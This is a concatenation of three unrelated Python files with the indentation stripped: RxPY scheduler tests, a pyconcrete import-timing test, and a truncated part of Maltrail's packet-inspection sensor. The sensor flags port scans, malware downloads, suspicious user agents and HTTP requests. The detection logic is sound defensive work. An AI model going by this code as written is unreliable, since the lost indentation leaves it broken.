ImmediateScheduler.singleton()
]
assert scheduler[0] is scheduler[1]
gate = [threading.Semaphore(0), threading.Semaphore(0)]
scheduler = [None, None]
def run(idx):
scheduler[idx] = ImmediateScheduler()
gate[idx].release()
for idx in (0, 1):
threading.Thread(target=run, args=(idx,)).start()
gate[idx].acquire()
assert scheduler[0] is not None
assert scheduler[1] is not None
assert scheduler[0] is scheduler[1]
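    # The behaviour exercised above -- every construction yielding one shared
    # instance, even across threads -- is typically achieved with a class-level
    # lock in __new__. A minimal, hypothetical sketch of the technique (not
    # RxPY's actual implementation):
    class _SingletonSketch:
        _lock = threading.Lock()
        _instance = None
        def __new__(cls):
            with cls._lock:
                if cls._instance is None:
                    cls._instance = super().__new__(cls)
                return cls._instance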
def test_immediate_extend(self):
class MyScheduler(ImmediateScheduler):
pass
scheduler = [
MyScheduler(),
MyScheduler.singleton(),
ImmediateScheduler.singleton(),
]
assert scheduler[0] is scheduler[1]
assert scheduler[0] is not scheduler[2]
def test_immediate_now(self):
scheduler = ImmediateScheduler()
diff = scheduler.now - default_now()
assert abs(diff) <= timedelta(milliseconds=1)
def test_immediate_now_units(self):
scheduler = ImmediateScheduler()
diff = scheduler.now
sleep(1.1)
diff = scheduler.now - diff
assert timedelta(milliseconds=1000) < diff < timedelta(milliseconds=1300)
def test_immediate_scheduleaction(self):
scheduler = ImmediateScheduler()
ran = False
def action(scheduler, state=None):
nonlocal ran
ran = True
scheduler.schedule(action)
assert ran
def test_immediate_schedule_action_error(self):
scheduler = ImmediateScheduler()
class MyException(Exception):
pass
def action(scheduler, state=None):
raise MyException()
with pytest.raises(MyException):
return scheduler.schedule(action)
def test_immediate_schedule_action_due_error(self):
scheduler = ImmediateScheduler()
ran = False
def action(scheduler, state=None):
nonlocal ran
ran = True
with pytest.raises(WouldBlockException):
scheduler.schedule_relative(0.1, action)
assert ran is False
def test_immediate_simple1(self):
scheduler = ImmediateScheduler()
xx = 0
def action(scheduler, state=None):
nonlocal xx
xx = state
return Disposable()
scheduler.schedule(action, 42)
assert xx == 42
def test_immediate_simple2(self):
scheduler = ImmediateScheduler()
xx = 0
def action(scheduler, state=None):
nonlocal xx
xx = state
return Disposable()
scheduler.schedule_absolute(default_now(), action, 42)
assert xx == 42
def test_immediate_simple3(self):
scheduler = ImmediateScheduler()
xx = 0
def action(scheduler, state=None):
nonlocal xx
xx = state
return Disposable()
scheduler.schedule_relative(DELTA_ZERO, action, 42)
assert xx == 42
def test_immediate_recursive1(self):
scheduler = ImmediateScheduler()
xx = 0
yy = 0
def action(scheduler, state=None):
nonlocal xx
xx = state
def inner_action(scheduler, state=None):
nonlocal yy
yy = state
return Disposable()
return scheduler.schedule(inner_action, 43)
scheduler.schedule(action, 42)
assert xx == 42
assert yy == 43
def test_immediate_recursive2(self):
scheduler = ImmediateScheduler()
xx = 0
yy = 0
def action(scheduler, state=None):
nonlocal xx
xx = state
def inner_action(scheduler, state=None):
nonlocal yy
yy = state
return Disposable()
return scheduler.schedule_absolute(default_now(), inner_action, 43)
scheduler.schedule_absolute(default_now(), action, 42)
assert xx == 42
assert yy == 43
def test_immediate_recursive3(self):
scheduler = ImmediateScheduler()
xx = 0
yy = 0
def action(scheduler, state=None):
nonlocal xx
xx = state
def inner_action(scheduler, state):
nonlocal yy
yy = state
return Disposable()
return scheduler.schedule_relative(DELTA_ZERO, inner_action, 43)
scheduler.schedule_relative(DELTA_ZERO, action, 42)
assert xx == 42
assert yy == 43
|
test_pye_performance.py
|
#!/usr/bin/env python
#
# Copyright 2015 Falldog Hsieh <falldog7@gmail.com>
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
import sys
import time
import logging
import unittest
from zipfile import ZipFile
from multiprocessing import Process, Queue
from os.path import dirname, abspath, join
from test import base
CUR_DIR = abspath(dirname(__file__))
ROOT_DIR = abspath(join(CUR_DIR, '..'))
DATA_DIR = join(CUR_DIR, 'data')
REQUEST_ZIP = join(DATA_DIR, 'requests-2.12.4.zip')
REQUEST_MAIN = join(DATA_DIR, 'main_requests.py')
PYADMIN_PATH = join(ROOT_DIR, 'pyconcrete-admin.py')
RUN_COUNT = int(os.environ.get('TEST_PYE_PERFORMANCE_COUNT', '5'))
logger = logging.getLogger('pyconcrete')
def main_requests(import_concrete, q):
"""
testing main function for multiprocessing
purpose: testing import without exception
"""
if import_concrete:
import pyconcrete
t = time.time()
import requests
from requests.adapters import HTTPAdapter
from requests.auth import HTTPDigestAuth, _basic_auth_str
from requests.compat import (Morsel, cookielib, getproxies, str, urljoin, urlparse, is_py3, builtin_str)
from requests.cookies import cookiejar_from_dict, morsel_to_cookie
from requests.exceptions import (
ConnectionError, ConnectTimeout, InvalidSchema, InvalidURL, MissingSchema, ReadTimeout, Timeout, RetryError
)
from requests.models import PreparedRequest
from requests.structures import CaseInsensitiveDict
from requests.sessions import SessionRedirectMixin
from requests.models import urlencode
from requests.hooks import default_hooks
t = time.time() - t
q.put(requests.__file__)
q.put(t)
@unittest.skipIf(not os.path.exists(REQUEST_ZIP), "requests zip file doesn't exists")
class TestPerformance(base.TestPyConcreteBase):
def setUp(self):
super(TestPerformance, self).setUp()
zip = ZipFile(REQUEST_ZIP)
zip.extractall(self.tmp_dir)
zip.close()
self.req_dir = join(self.tmp_dir, 'requests')
base.touch(join(self.req_dir, '__init__.py'))
def _test_requests(self, import_concrete):
sys.path.insert(0, self.req_dir)
q = Queue()
p = Process(target=main_requests, args=(import_concrete, q))
p.start()
path = q.get(timeout=5)
t = q.get(timeout=2)
p.join()
self.assertTrue(path.startswith(self.req_dir), "wrong import path of requests = %s" % path)
return t
def test_requests_pye(self):
self.lib_compile_pye(self.req_dir, remove_py=True, remove_pyc=True)
t = 0.0
for i in range(RUN_COUNT):
t += self._test_requests(True)
logger.info('test import request (pye) [count=%d] total time = %.2f, avg time = %.2f' % (RUN_COUNT, t, t/RUN_COUNT))
def test_requests_pyc(self):
self.lib_compile_pyc(self.req_dir, remove_py=True)
t = 0.0
for i in range(RUN_COUNT):
t += self._test_requests(False)
logger.info('test import request (pyc) [count=%d] total time = %.2f, avg time = %.2f' % (RUN_COUNT, t, t/RUN_COUNT))
def test_requests_pyc_with_import_hooker(self):
self.lib_compile_pyc(self.req_dir, remove_py=True)
t = 0.0
for i in range(RUN_COUNT):
t += self._test_requests(True)
logger.info('test import request (pyc) (import hooker) [count=%d] total time = %.2f, avg time = %.2f' % (RUN_COUNT, t, t/RUN_COUNT))
def test_requests_py(self):
t = 0.0
for i in range(RUN_COUNT):
t += self._test_requests(False)
logger.info('test import request (py) [count=%d] total time = %.2f, avg time = %.2f' % (RUN_COUNT, t, t/RUN_COUNT))
def test_requests_py_with_import_hooker(self):
t = 0.0
for i in range(RUN_COUNT):
t += self._test_requests(True)
logger.info('test import request (py) (import hooker) [count=%d] total time = %.2f, avg time = %.2f' % (RUN_COUNT, t, t/RUN_COUNT))
if __name__ == '__main__':
unittest.main()
|
sensor.py
|
#!/usr/bin/env python
"""
Copyright (c) 2014-2022 Maltrail developers (https://github.com/stamparm/maltrail/)
See the file 'LICENSE' for copying permission
"""
from __future__ import print_function # Requires: Python >= 2.6
import sys
sys.dont_write_bytecode = True
import cProfile
import inspect
import math
import mmap
import optparse
import os
import platform
import re
import socket
import subprocess
import struct
import threading
import time
import traceback
import warnings
from core.addr import inet_ntoa6
from core.addr import addr_port
from core.attribdict import AttribDict
from core.common import check_connection
from core.common import check_sudo
from core.common import check_whitelisted
from core.common import get_ex_message
from core.common import get_text
from core.common import is_local
from core.common import load_trails
from core.common import patch_parser
from core.compat import xrange
from core.datatype import LRUDict
from core.enums import BLOCK_MARKER
from core.enums import CACHE_TYPE
from core.enums import PROTO
from core.enums import TRAIL
from core.log import create_log_directory
from core.log import flush_condensed_events
from core.log import get_error_log_handle
from core.log import log_error
from core.log import log_event
from core.parallel import worker
from core.parallel import write_block
from core.settings import config
from core.settings import CAPTURE_TIMEOUT
from core.settings import CHECK_CONNECTION_MAX_RETRIES
from core.settings import CONFIG_FILE
from core.settings import CONSONANTS
from core.settings import DLT_OFFSETS
from core.settings import DNS_EXHAUSTION_THRESHOLD
from core.settings import GENERIC_SINKHOLE_REGEX
from core.settings import HOMEPAGE
from core.settings import HOURLY_SECS
from core.settings import HTTP_TIME_FORMAT
from core.settings import IGNORE_DNS_QUERY_SUFFIXES
from core.settings import IPPROTO_LUT
from core.settings import IS_WIN
from core.settings import LOCALHOST_IP
from core.settings import LOCAL_SUBDOMAIN_LOOKUPS
from core.settings import MAX_CACHE_ENTRIES
from core.settings import MMAP_ZFILL_CHUNK_LENGTH
from core.settings import NAME
from core.settings import NO_SUCH_NAME_COUNTERS
from core.settings import NO_SUCH_NAME_PER_HOUR_THRESHOLD
from core.settings import INFECTION_SCANNING_THRESHOLD
from core.settings import PORT_SCANNING_THRESHOLD
from core.settings import POTENTIAL_INFECTION_PORTS
from core.settings import read_config
from core.settings import REGULAR_SENSOR_SLEEP_TIME
from core.settings import SNAP_LEN
from core.settings import SUSPICIOUS_CONTENT_TYPES
from core.settings import SUSPICIOUS_DIRECT_DOWNLOAD_EXTENSIONS
from core.settings import SUSPICIOUS_DIRECT_IP_URL_REGEX
from core.settings import SUSPICIOUS_DOMAIN_CONSONANT_THRESHOLD
from core.settings import SUSPICIOUS_DOMAIN_ENTROPY_THRESHOLD
from core.settings import SUSPICIOUS_DOMAIN_LENGTH_THRESHOLD
from core.settings import SUSPICIOUS_HTTP_PATH_REGEXES
from core.settings import SUSPICIOUS_HTTP_REQUEST_PRE_CONDITION
from core.settings import SUSPICIOUS_HTTP_REQUEST_REGEXES
from core.settings import SUSPICIOUS_HTTP_REQUEST_FORCE_ENCODE_CHARS
from core.settings import SUSPICIOUS_PROXY_PROBE_PRE_CONDITION
from core.settings import SUSPICIOUS_UA_REGEX
from core.settings import VALID_DNS_NAME_REGEX
from core.settings import trails
from core.settings import VERSION
from core.settings import WEB_SCANNING_THRESHOLD
from core.settings import WHITELIST
from core.settings import WHITELIST_DIRECT_DOWNLOAD_KEYWORDS
from core.settings import WHITELIST_LONG_DOMAIN_NAME_KEYWORDS
from core.settings import WHITELIST_HTTP_REQUEST_PATHS
from core.settings import WHITELIST_UA_REGEX
from core.update import update_ipcat
from core.update import update_trails
from thirdparty import six
from thirdparty.six.moves import urllib as _urllib
warnings.filterwarnings(action="ignore", category=DeprecationWarning) # NOTE: https://github.com/helpsystems/pcapy/pull/67/files
_buffer = None
_caps = []
_connect_sec = 0
_connect_src_dst = {}
_connect_src_details = {}
_path_src_dst = {}
_path_src_dst_details = {}
_count = 0
_locks = AttribDict()
_multiprocessing = None
_n = None
_result_cache = LRUDict(MAX_CACHE_ENTRIES)
_local_cache = LRUDict(MAX_CACHE_ENTRIES)
_last_syn = None
_last_logged_syn = None
_last_udp = None
_last_logged_udp = None
_done_count = 0
_done_lock = threading.Lock()
_subdomains = {}
_subdomains_sec = None
_dns_exhausted_domains = set()
class _set(set):
pass
try:
import pcapy
except ImportError:
if IS_WIN:
exit("[!] please install 'WinPcap' (e.g. 'http://www.winpcap.org/install/') and Pcapy (e.g. 'https://breakingcode.wordpress.com/?s=pcapy')")
else:
msg = "[!] please install 'Pcapy' (e.g. 'sudo pip%s install pcapy-ng')" % ('3' if six.PY3 else '2')
exit(msg)
def _check_domain_member(query, domains):
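    # Example: for query "mail.example.com" the candidate suffixes checked
    # against `domains` are "mail.example.com", "example.com" and "com".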
parts = query.lower().split('.')
for i in xrange(0, len(parts)):
domain = '.'.join(parts[i:])
if domain in domains:
return True
return False
def _check_domain_whitelisted(query):
result = _result_cache.get((CACHE_TYPE.DOMAIN_WHITELISTED, query))
if result is None:
result = _check_domain_member(re.split(r"(?i)[^A-Z0-9._-]", query or "")[0], WHITELIST)
_result_cache[(CACHE_TYPE.DOMAIN_WHITELISTED, query)] = result
return result
def _check_domain(query, sec, usec, src_ip, src_port, dst_ip, dst_port, proto, packet=None):
if query:
query = query.lower()
if ':' in query:
query = query.split(':', 1)[0]
if query.replace('.', "").isdigit(): # IP address
return
if _result_cache.get((CACHE_TYPE.DOMAIN, query)) is False:
return
result = False
if re.search(VALID_DNS_NAME_REGEX, query) is not None and not _check_domain_whitelisted(query):
parts = query.split('.')
if query.endswith(".ip-adress.com"): # Reference: https://www.virustotal.com/gui/domain/ip-adress.com/relations
_ = '.'.join(parts[:-2])
trail = "%s(.ip-adress.com)" % _
if _ in trails:
result = True
log_event((sec, usec, src_ip, src_port, dst_ip, dst_port, proto, TRAIL.DNS, trail, trails[_][0], trails[_][1]), packet)
if not result:
for i in xrange(0, len(parts)):
domain = '.'.join(parts[i:])
if domain in trails:
if domain == query:
trail = domain
else:
_ = ".%s" % domain
trail = "(%s)%s" % (query[:-len(_)], _)
if not (re.search(r"(?i)\A([rd]?ns|nf|mx|nic)\d*\.", query) and any(_ in trails.get(domain, " ")[0] for _ in ("suspicious", "sinkhole"))): # e.g. ns2.nobel.su
if not ((query == trail or parts[0] == "www") and any(_ in trails.get(domain, " ")[0] for _ in ("dynamic", "free web"))): # e.g. noip.com
result = True
log_event((sec, usec, src_ip, src_port, dst_ip, dst_port, proto, TRAIL.DNS, trail, trails[domain][0], trails[domain][1]), packet)
break
if not result and config.USE_HEURISTICS:
if len(parts[0]) > SUSPICIOUS_DOMAIN_LENGTH_THRESHOLD and '-' not in parts[0]:
trail = None
if len(parts) > 2:
trail = "(%s).%s" % ('.'.join(parts[:-2]), '.'.join(parts[-2:]))
elif len(parts) == 2:
trail = "(%s).%s" % (parts[0], parts[1])
else:
trail = query
if trail and not any(_ in trail for _ in WHITELIST_LONG_DOMAIN_NAME_KEYWORDS):
result = True
log_event((sec, usec, src_ip, src_port, dst_ip, dst_port, proto, TRAIL.DNS, trail, "long domain (suspicious)", "(heuristic)"), packet)
if not result and trails._regex:
match = re.search(trails._regex, query)
if match:
group, trail = [_ for _ in match.groupdict().items() if _[1] is not None][0]
candidate = trails._regex.split("(?P<")[int(group[1:]) + 1]
candidate = candidate.split('>', 1)[-1].rstrip('|')[:-1]
if candidate in trails:
result = True
trail = match.group(0)
prefix, suffix = query[:match.start()], query[match.end():]
if prefix:
trail = "(%s)%s" % (prefix, trail)
if suffix:
trail = "%s(%s)" % (trail, suffix)
trail = trail.replace(".)", ").")
log_event((sec, usec, src_ip, src_port, dst_ip, dst_port, proto, TRAIL.DNS, trail, trails[candidate][0], trails[candidate][1]), packet)
if not result and ".onion." in query:
trail = re.sub(r"(\.onion)(\..*)", r"\1(\2)", query)
_ = trail.split('(')[0]
if _ in trails:
result = True
log_event((sec, usec, src_ip, src_port, dst_ip, dst_port, proto, TRAIL.DNS, trail, trails[_][0], trails[_][1]), packet)
if result is False:
_result_cache[(CACHE_TYPE.DOMAIN, query)] = False
def _get_local_prefix():
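    # Heuristic: derive the local network prefix (e.g. "192.168.") as the most
    # common value obtained by stripping the last two octets from each observed
    # source address; falls back to the previously cached value, or '_' when
    # nothing has been observed yet.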
_sources = set(_.split('~')[0] for _ in _connect_src_dst.keys())
_candidates = [re.sub(r"\d+\.\d+\Z", "", _) for _ in _sources]
_ = sorted(((_candidates.count(_), _) for _ in set(_candidates)), reverse=True)
result = _[0][1] if _ else ""
if result:
_result_cache[(CACHE_TYPE.LOCAL_PREFIX, "")] = result
else:
result = _result_cache.get((CACHE_TYPE.LOCAL_PREFIX, ""))
return result or '_'
def _process_packet(packet, sec, usec, ip_offset):
"""
Processes single (raw) IP layer data
"""
global _connect_sec
global _last_syn
global _last_logged_syn
global _last_udp
global _last_logged_udp
global _subdomains_sec
try:
if config.USE_HEURISTICS:
if _locks.connect_sec:
_locks.connect_sec.acquire()
connect_sec = _connect_sec
_connect_sec = sec
if _locks.connect_sec:
_locks.connect_sec.release()
if sec > connect_sec:
for key in _connect_src_dst:
_src_ip, _dst = key.split('~')
if not _dst.isdigit() and len(_connect_src_dst[key]) > PORT_SCANNING_THRESHOLD:
if not check_whitelisted(_src_ip):
_dst_ip = _dst
for _ in _connect_src_details[key]:
log_event((sec, usec, _src_ip, _[2], _dst_ip, _[3], PROTO.TCP, TRAIL.IP, _src_ip, "potential port scanning", "(heuristic)"), packet)
elif len(_connect_src_dst[key]) > INFECTION_SCANNING_THRESHOLD:
_dst_port = _dst
_dst_ip = [_[-1] for _ in _connect_src_details[key]]
_src_port = [_[-2] for _ in _connect_src_details[key]]
if len(_dst_ip) == len(set(_dst_ip)):
if _src_ip.startswith(_get_local_prefix()):
log_event((sec, usec, _src_ip, _src_port[0], _dst_ip[0], _dst_port, PROTO.TCP, TRAIL.PORT, _dst_port, "potential infection", "(heuristic)"), packet)
_connect_src_dst.clear()
_connect_src_details.clear()
for key in _path_src_dst:
if len(_path_src_dst[key]) > WEB_SCANNING_THRESHOLD:
_src_ip, _dst_ip = key.split('~')
_sec, _usec, _src_port, _dst_port, _path = _path_src_dst_details[key].pop()
log_event((_sec, _usec, _src_ip, _src_port, _dst_ip, _dst_port, PROTO.TCP, TRAIL.PATH, "*", "potential web scanning", "(heuristic)"), packet)
_path_src_dst.clear()
_path_src_dst_details.clear()
ip_data = packet[ip_offset:]
ip_version = ord(ip_data[0:1]) >> 4
localhost_ip = LOCALHOST_IP[ip_version]
if ip_version == 0x04: # IPv4
ip_header = struct.unpack("!BBHHHBBH4s4s", ip_data[:20])
fragment_offset = ip_header[4] & 0x1fff
if fragment_offset != 0:
return
iph_length = (ip_header[0] & 0xf) << 2
protocol = ip_header[6]
src_ip = socket.inet_ntoa(ip_header[8])
dst_ip = socket.inet_ntoa(ip_header[9])
elif ip_version == 0x06: # IPv6
# Reference: http://chrisgrundemann.com/index.php/2012/introducing-ipv6-understanding-ipv6-addresses/
ip_header = struct.unpack("!BBHHBB16s16s", ip_data[:40])
iph_length = 40
protocol = ip_header[4]
src_ip = inet_ntoa6(ip_header[6])
dst_ip = inet_ntoa6(ip_header[7])
else:
return
if protocol == socket.IPPROTO_TCP: # TCP
src_port, dst_port, _, _, doff_reserved, flags = struct.unpack("!HHLLBB", ip_data[iph_length:iph_length + 14])
if flags != 2 and config.plugin_functions:
if dst_ip in trails:
log_event((sec, usec, src_ip, src_port, dst_ip, dst_port, PROTO.TCP, TRAIL.IP, dst_ip, trails[dst_ip][0], trails[dst_ip][1]), packet, skip_write=True)
elif src_ip in trails and dst_ip != localhost_ip:
log_event((sec, usec, src_ip, src_port, dst_ip, dst_port, PROTO.TCP, TRAIL.IP, src_ip, trails[src_ip][0], trails[src_ip][1]), packet, skip_write=True)
if flags == 2: # SYN set (only)
_ = _last_syn
_last_syn = (sec, src_ip, src_port, dst_ip, dst_port)
if _ == _last_syn: # skip bursts
return
if dst_ip in trails or addr_port(dst_ip, dst_port) in trails:
_ = _last_logged_syn
_last_logged_syn = _last_syn
if _ != _last_logged_syn:
trail = addr_port(dst_ip, dst_port)
if trail not in trails:
trail = dst_ip
if not any(_ in trails[trail][0] for _ in ("attacker",)) and not ("parking site" in trails[trail][0] and dst_port not in (80, 443)):
log_event((sec, usec, src_ip, src_port, dst_ip, dst_port, PROTO.TCP, TRAIL.IP if ':' not in trail else TRAIL.IPORT, trail, trails[trail][0], trails[trail][1]), packet)
elif (src_ip in trails or addr_port(src_ip, src_port) in trails) and dst_ip != localhost_ip:
_ = _last_logged_syn
_last_logged_syn = _last_syn
if _ != _last_logged_syn:
trail = addr_port(src_ip, src_port)
if trail not in trails:
trail = src_ip
if not any(_ in trails[trail][0] for _ in ("malware",)):
log_event((sec, usec, src_ip, src_port, dst_ip, dst_port, PROTO.TCP, TRAIL.IP if ':' not in trail else TRAIL.IPORT, trail, trails[trail][0], trails[trail][1]), packet)
if config.USE_HEURISTICS:
if dst_ip != localhost_ip:
key = "%s~%s" % (src_ip, dst_ip)
if key not in _connect_src_dst:
_connect_src_dst[key] = set()
_connect_src_details[key] = set()
_connect_src_dst[key].add(dst_port)
_connect_src_details[key].add((sec, usec, src_port, dst_port))
if dst_port in POTENTIAL_INFECTION_PORTS:
key = "%s~%s" % (src_ip, dst_port)
if key not in _connect_src_dst:
_connect_src_dst[key] = set()
_connect_src_details[key] = set()
_connect_src_dst[key].add(dst_ip)
_connect_src_details[key].add((sec, usec, src_port, dst_ip))
else:
tcph_length = doff_reserved >> 4
h_size = iph_length + (tcph_length << 2)
tcp_data = get_text(ip_data[h_size:])
if tcp_data.startswith("HTTP/"):
match = re.search(GENERIC_SINKHOLE_REGEX, tcp_data[:2000])
if match:
trail = match.group(0)
log_event((sec, usec, src_ip, src_port, dst_ip, dst_port, PROTO.TCP, TRAIL.HTTP, trail, "sinkhole response (malware)", "(heuristic)"), packet)
else:
index = tcp_data.find("<title>")
if index >= 0:
title = tcp_data[index + len("<title>"):tcp_data.find("</title>", index)]
if re.search(r"domain name has been seized by|Domain Seized|Domain Seizure", title):
log_event((sec, usec, src_ip, src_port, dst_ip, dst_port, PROTO.TCP, TRAIL.HTTP, title, "seized domain (suspicious)", "(heuristic)"), packet)
content_type = None
first_index = tcp_data.find("\r\nContent-Type:")
if first_index >= 0:
first_index = first_index + len("\r\nContent-Type:")
last_index = tcp_data.find("\r\n", first_index)
if last_index >= 0:
content_type = tcp_data[first_index:last_index].strip().lower()
if content_type and content_type in SUSPICIOUS_CONTENT_TYPES:
log_event((sec, usec, src_ip, src_port, dst_ip, dst_port, PROTO.TCP, TRAIL.HTTP, content_type, "content type (suspicious)", "(heuristic)"), packet)
method, path = None, None
if " HTTP/" in tcp_data:
index = tcp_data.find("\r\n")
if index >= 0:
line = tcp_data[:index]
if line.count(' ') == 2 and " HTTP/" in line:
method, path, _ = line.split(' ')
if method and path:
post_data = None
host = dst_ip
first_index = tcp_data.find("\r\nHost:")
path = path.lower()
if first_index >= 0:
first_index = first_index + len("\r\nHost:")
last_index = tcp_data.find("\r\n", first_index)
if last_index >= 0:
host = tcp_data[first_index:last_index]
host = host.strip().lower()
if host.endswith(":80"):
host = host[:-3]
if host and host[0].isalpha() and dst_ip in trails:
log_event((sec, usec, src_ip, src_port, dst_ip, dst_port, PROTO.TCP, TRAIL.IP, "%s (%s)" % (dst_ip, host.split(':')[0]), trails[dst_ip][0], trails[dst_ip][1]), packet)
elif re.search(r"\A\d+\.[0-9.]+\Z", host or "") and re.search(SUSPICIOUS_DIRECT_IP_URL_REGEX, "%s%s" % (host, path)):
if not dst_ip.startswith(_get_local_prefix()):
trail = "(%s)%s" % (host, path)
log_event((sec, usec, src_ip, src_port, dst_ip, dst_port, PROTO.TCP, TRAIL.HTTP, trail, "potential iot-malware download (suspicious)", "(heuristic)"), packet)
return
elif config.CHECK_HOST_DOMAINS:
_check_domain(host, sec, usec, src_ip, src_port, dst_ip, dst_port, PROTO.TCP, packet)
elif config.USE_HEURISTICS and config.CHECK_MISSING_HOST:
log_event((sec, usec, src_ip, src_port, dst_ip, dst_port, PROTO.TCP, TRAIL.HTTP, "%s%s" % (host, path), "missing host header (suspicious)", "(heuristic)"), packet)
index = tcp_data.find("\r\n\r\n")
if index >= 0:
post_data = tcp_data[index + 4:]
url = None
if config.USE_HEURISTICS and path.startswith('/'):
_path = path.split('/')[1]
key = "%s~%s" % (src_ip, dst_ip)
if key not in _path_src_dst:
_path_src_dst[key] = set()
_path_src_dst[key].add(_path)
if key not in _path_src_dst_details:
_path_src_dst_details[key] = set()
_path_src_dst_details[key].add((sec, usec, src_port, dst_port, path))
elif config.USE_HEURISTICS and dst_port == 80 and path.startswith("http://") and any(_ in path for _ in SUSPICIOUS_PROXY_PROBE_PRE_CONDITION) and not _check_domain_whitelisted(path.split('/')[2]):
trail = re.sub(r"(http://[^/]+/)(.+)", r"\g<1>(\g<2>)", path)
trail = re.sub(r"(http://)([^/(]+)", lambda match: "%s%s" % (match.group(1), match.group(2).split(':')[0].rstrip('.')), trail)
log_event((sec, usec, src_ip, src_port, dst_ip, dst_port, PROTO.TCP, TRAIL.HTTP, trail, "potential proxy probe (suspicious)", "(heuristic)"), packet)
return
elif "://" in path:
unquoted_path = _urllib.parse.unquote(path)
key = "code execution"
if key not in _local_cache:
_local_cache[key] = next(_[1] for _ in SUSPICIOUS_HTTP_REQUEST_REGEXES if "code execution" in _[0])
if re.search(_local_cache[key], unquoted_path, re.I) is None: # NOTE: to prevent malware domain FPs in case of outside scanners
url = path.split("://", 1)[1]
if '/' not in url:
url = "%s/" % url
host, path = url.split('/', 1)
if host.endswith(":80"):
host = host[:-3]
path = "/%s" % path
proxy_domain = host.split(':')[0]
_check_domain(proxy_domain, sec, usec, src_ip, src_port, dst_ip, dst_port, PROTO.TCP, packet)
elif method == "CONNECT":
if '/' in path:
host, path = path.split('/', 1)
path = "/%s" % path
else:
host, path = path, '/'
if host.endswith(":80"):
host = host[:-3]
url = "%s%s" % (host, path)
proxy_domain = host.split(':')[0]
_check_domain(proxy_domain, sec, usec, src_ip, src_port, dst_ip, dst_port, PROTO.TCP, packet)
if url is None:
url = "%s%s" % (host, path)
if config.USE_HEURISTICS:
user_agent, result = None, None
first_index = tcp_data.find("\r\nUser-Agent:")
if first_index >= 0:
first_index = first_index + len("\r\nUser-Agent:")
last_index = tcp_data.find("\r\n", first_index)
if last_index >= 0:
user_agent = tcp_data[first_index:last_index]
user_agent = _urllib.parse.unquote(user_agent).strip()
if user_agent:
result = _result_cache.get((CACHE_TYPE.USER_AGENT, user_agent))
if result is None:
if re.search(WHITELIST_UA_REGEX, user_agent, re.I) is None:
match = re.search(SUSPICIOUS_UA_REGEX, user_agent)
if match:
def _(value):
return value.rstrip('\\').replace('(', "\\(").replace(')', "\\)")
parts = user_agent.split(match.group(0), 1)
if len(parts) > 1 and parts[0] and parts[-1]:
result = _result_cache[(CACHE_TYPE.USER_AGENT, user_agent)] = "%s (%s)" % (_(match.group(0)), _(user_agent))
else:
result = _result_cache[(CACHE_TYPE.USER_AGENT, user_agent)] = _(match.group(0)).join(("(%s)" if part else "%s") % _(part) for part in parts)
if not result:
_result_cache[(CACHE_TYPE.USER_AGENT, user_agent)] = False
if result:
log_event((sec, usec, src_ip, src_port, dst_ip, dst_port, PROTO.TCP, TRAIL.UA, result, "user agent (suspicious)", "(heuristic)"), packet)
if not _check_domain_whitelisted(host):
path = path.replace("//", '/')
unquoted_path = _urllib.parse.unquote(path)
unquoted_post_data = _urllib.parse.unquote(post_data or "")
checks = [path.rstrip('/')]
if '?' in path:
checks.append(path.split('?')[0].rstrip('/'))
if '=' in path:
checks.append(path[:path.index('=') + 1])
_ = re.sub(r"(\w+=)[^&=]+", r"\g<1>", path)
if _ not in checks:
checks.append(_)
if _.count('/') > 1:
checks.append("/%s" % _.split('/')[-1])
elif post_data:
checks.append("%s?%s" % (path, unquoted_post_data.lower()))
if checks[-1].count('/') > 1:
checks.append(checks[-1][:checks[-1].rfind('/')])
checks.append(checks[0][checks[0].rfind('/'):].split('?')[0])
for check in filter(None, checks):
for _ in ("", host):
check = "%s%s" % (_, check)
if check in trails:
if '?' not in path and '?' in check and post_data:
trail = "%s(%s \\(%s %s\\))" % (host, path, method, post_data.strip())
log_event((sec, usec, src_ip, src_port, dst_ip, dst_port, PROTO.TCP, TRAIL.HTTP, trail, trails[check][0], trails[check][1]))
else:
parts = url.split(check)
other = ("(%s)" % _ if _ else _ for _ in parts)
trail = check.join(other)
log_event((sec, usec, src_ip, src_port, dst_ip, dst_port, PROTO.TCP, TRAIL.URL, trail, trails[check][0], trails[check][1]))
return
if "%s/" % host in trails:
trail = "%s/" % host
log_event((sec, usec, src_ip, src_port, dst_ip, dst_port, PROTO.TCP, TRAIL.URL, trail, trails[trail][0], trails[trail][1]))
return
if config.USE_HEURISTICS:
match = re.search(r"\b(CF-Connecting-IP|True-Client-IP|X-Forwarded-For):\s*([0-9.]+)".encode(), packet, re.I)
if match:
src_ip = "%s,%s" % (src_ip, match.group(1))
for char in SUSPICIOUS_HTTP_REQUEST_FORCE_ENCODE_CHARS:
replacement = SUSPICIOUS_HTTP_REQUEST_FORCE_ENCODE_CHARS[char]
path = path.replace(char, replacement)
if post_data:
post_data = post_data.replace(char, replacement)
if not any(_ in unquoted_path.lower() for _ in WHITELIST_HTTP_REQUEST_PATHS):
if any(_ in unquoted_path for _ in SUSPICIOUS_HTTP_REQUEST_PRE_CONDITION):
found = _result_cache.get((CACHE_TYPE.PATH, unquoted_path))
if found is None:
for desc, regex in SUSPICIOUS_HTTP_REQUEST_REGEXES:
if re.search(regex, unquoted_path, re.I | re.DOTALL):
found = desc
break
_result_cache[(CACHE_TYPE.PATH, unquoted_path)] = found or ""
if found and not ("data leakage" in found and is_local(dst_ip)):
trail = "%s(%s)" % (host, path)
log_event((sec, usec, src_ip, src_port, dst_ip, dst_port, PROTO.TCP, TRAIL.URL, trail, "%s (suspicious)" % found, "(heuristic)"), packet)
return
if any(_ in unquoted_post_data for _ in SUSPICIOUS_HTTP_REQUEST_PRE_CONDITION):
found = _result_cache.get((CACHE_TYPE.POST_DATA, unquoted_post_data))
if found is None:
for desc, regex in SUSPICIOUS_HTTP_REQUEST_REGEXES:
if re.search(regex, unquoted_post_data, re.I | re.DOTALL):
found = desc
break
_result_cache[(CACHE_TYPE.POST_DATA, unquoted_post_data)] = found or ""
if found:
trail = "%s(%s \\(%s %s\\))" % (host, path, method, post_data.strip())
log_event((sec, usec, src_ip, src_port, dst_ip, dst_port, PROTO.TCP, TRAIL.HTTP, trail, "%s (suspicious)" % found, "(heuristic)"), packet)
return
if '.' in path:
